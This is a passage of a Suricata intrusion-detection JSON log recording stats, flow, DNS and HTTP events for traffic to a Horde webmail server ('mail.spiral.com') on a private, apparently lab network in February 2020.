p":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2311,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2390}},"flow_mgr":{"closed_pruned":2728,"new_pruned":15,"est_pruned":2355,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22483,"memcap_state":0,"memcap_global":0},"http":{"memuse":59670,"memcap":0}}} {"timestamp":"2020-02-29T00:11:55.000994+0000","flow_id":1133320201266640,"event_type":"flow","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":29,"pkts_toclient":34,"bytes_toserver":4321,"bytes_toclient":35958,"start":"2020-02-29T00:10:43.157136+0000","end":"2020-02-29T00:10:54.388286+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:55.001212+0000","flow_id":1058609245547071,"event_type":"flow","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1178,"bytes_toclient":824,"start":"2020-02-29T00:10:49.092735+0000","end":"2020-02-29T00:10:54.388780+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:57.953842+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56955,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:58.000468+0000","flow_id":459856429493109,"event_type":"flow","src_ip":"192.168.10.122","src_port":36544,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:56.895861+0000","end":"2020-02-29T00:06:57.004740+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:58.062091+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56955,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:58.062091+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56955,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:58.072837+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56956,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:11:58.181226+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56956,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:58.181226+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56956,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:01.000422+0000","flow_id":463232274070173,"event_type":"flow","src_ip":"192.168.10.122","src_port":40239,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:00.719517+0000","end":"2020-02-29T00:07:00.828093+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:01.000669+0000","flow_id":339717604553391,"event_type":"flow","src_ip":"192.168.10.122","src_port":55353,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:00.242351+0000","end":"2020-02-29T00:07:00.351112+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:02.000188+0000","event_type":"stats","stats":{"uptime":14374,"capture":{"kernel_packets":134895,"kernel_drops":0},"decoder":{"pkts":134904,"bytes":93002988,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134904,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2357,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21820,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:09.000294+0000","event_type":"stats","stats":{"uptime":14381,"capture":{"kernel_packets":134905,"kernel_drops":0},"decoder":{"pkts":134906,"bytes":93003072,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134906,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2359,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21820,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:09.001834+0000","flow_id":20416851390565,"event_type":"flow","src_ip":"192.168.10.122","src_port":49564,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:08.241765+0000","end":"2020-02-29T00:07:08.350330+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:09.001982+0000","flow_id":782648992382295,"event_type":"flow","src_ip":"192.168.10.122","src_port":48718,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:08.048471+0000","end":"2020-02-29T00:07:08.157035+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:12.000464+0000","flow_id":174022061955973,"event_type":"flow","src_ip":"192.168.10.122","src_port":57163,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:11.433029+0000","end":"2020-02-29T00:07:11.541143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:16.000302+0000","event_type":"stats","stats":{"uptime":14388,"capture":{"kernel_packets":134905,"kernel_drops":0},"decoder":{"pkts":134906,"bytes":93003072,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134906,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2362,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20827,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:19.000426+0000","flow_id":1587654728744039,"event_type":"flow","src_ip":"192.168.10.81","src_port":52718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":10,"bytes_toserver":1285,"bytes_toclient":8956,"start":"2020-02-29T00:11:13.392295+0000","end":"2020-02-29T00:11:18.677600+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:20.598346+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54606,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21578,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:20.707223+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54606,"proto":"UDP","dns":{"type":"answer","id":21578,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:20.707223+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54606,"proto":"UDP","dns":{"type":"answer","id":21578,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:20.796483+0000","flow_id":1144822130078229,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34806,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5607}} {"timestamp":"2020-02-29T00:12:21.000501+0000","flow_id":1599723571538018,"event_type":"flow","src_ip":"192.168.10.122","src_port":58451,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:20.223330+0000","end":"2020-02-29T00:07:20.332082+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:23.000191+0000","event_type":"stats","stats":{"uptime":14395,"capture":{"kernel_packets":134911,"kernel_drops":0},"decoder":{"pkts":134924,"bytes":93010920,"invalid":187,"ipv4":133435,"ipv6":8,"ethernet":134924,"raw":0,"null":0,"sll":0,"tcp":128167,"udp":5066,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2755,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2771,"synack":2762,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1796,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2313,"failed_udp":111},"tx":{"http":4623,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2393}},"flow_mgr":{"closed_pruned":2731,"new_pruned":15,"est_pruned":2362,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20828,"memcap_state":0,"memcap_global":0},"http":{"memuse":76404,"memcap":0}}} {"timestamp":"2020-02-29T00:12:23.000978+0000","flow_id":1157088548497515,"event_type":"flow","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":35,"bytes_toserver":4407,"bytes_toclient":36375,"start":"2020-02-29T00:10:16.600171+0000","end":"2020-02-29T00:11:22.851541+0000","age":66,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:23.001319+0000","flow_id":110654126986856,"event_type":"flow","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:10:22.824936+0000","end":"2020-02-29T00:11:22.851474+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:25.000815+0000","flow_id":1212171508187051,"event_type":"flow","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":14,"bytes_toserver":2320,"bytes_toclient":11299,"start":"2020-02-29T00:11:18.851883+0000","end":"2020-02-29T00:11:24.439161+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:25.801798+0000","flow_id":1144822130078229,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34806,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5607},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20704,"tx_id":0}} {"timestamp":"2020-02-29T00:12:27.645979+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42020,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54334,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:27.754252+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42020,"proto":"UDP","dns":{"type":"answer","id":54334,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:27.754252+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42020,"proto":"UDP","dns":{"type":"answer","id":54334,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:27.914566+0000","flow_id":204108328578649,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34808,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6663}} {"timestamp":"2020-02-29T00:12:30.000234+0000","event_type":"stats","stats":{"uptime":14402,"capture":{"kernel_packets":134931,"kernel_drops":0},"decoder":{"pkts":134947,"bytes":93020018,"invalid":187,"ipv4":133456,"ipv6":8,"ethernet":134947,"raw":0,"null":0,"sll":0,"tcp":128186,"udp":5068,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2756,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2772,"synack":2763,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1797,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2314,"failed_udp":111},"tx":{"http":4624,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2394}},"flow_mgr":{"closed_pruned":2734,"new_pruned":15,"est_pruned":2363,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21159,"memcap_state":0,"memcap_global":0},"http":{"memuse":111087,"memcap":0}}} {"timestamp":"2020-02-29T00:12:30.444193+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50814,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50639,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:30.552573+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50814,"proto":"UDP","dns":{"type":"answer","id":50639,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:30.552573+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50814,"proto":"UDP","dns":{"type":"answer","id":50639,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:30.573910+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:12:30.573910+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:12:32.000671+0000","flow_id":1771509394621068,"event_type":"flow","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1110,"start":"2020-02-29T00:11:26.508556+0000","end":"2020-02-29T00:11:31.703191+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:32.915744+0000","flow_id":204108328578649,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34808,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6663},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31984,"tx_id":0}} {"timestamp":"2020-02-29T00:12:34.485767+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34810,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:12:34.494123+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39806,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.602655+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56201,"proto":"UDP","dns":{"type":"answer","id":39806,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 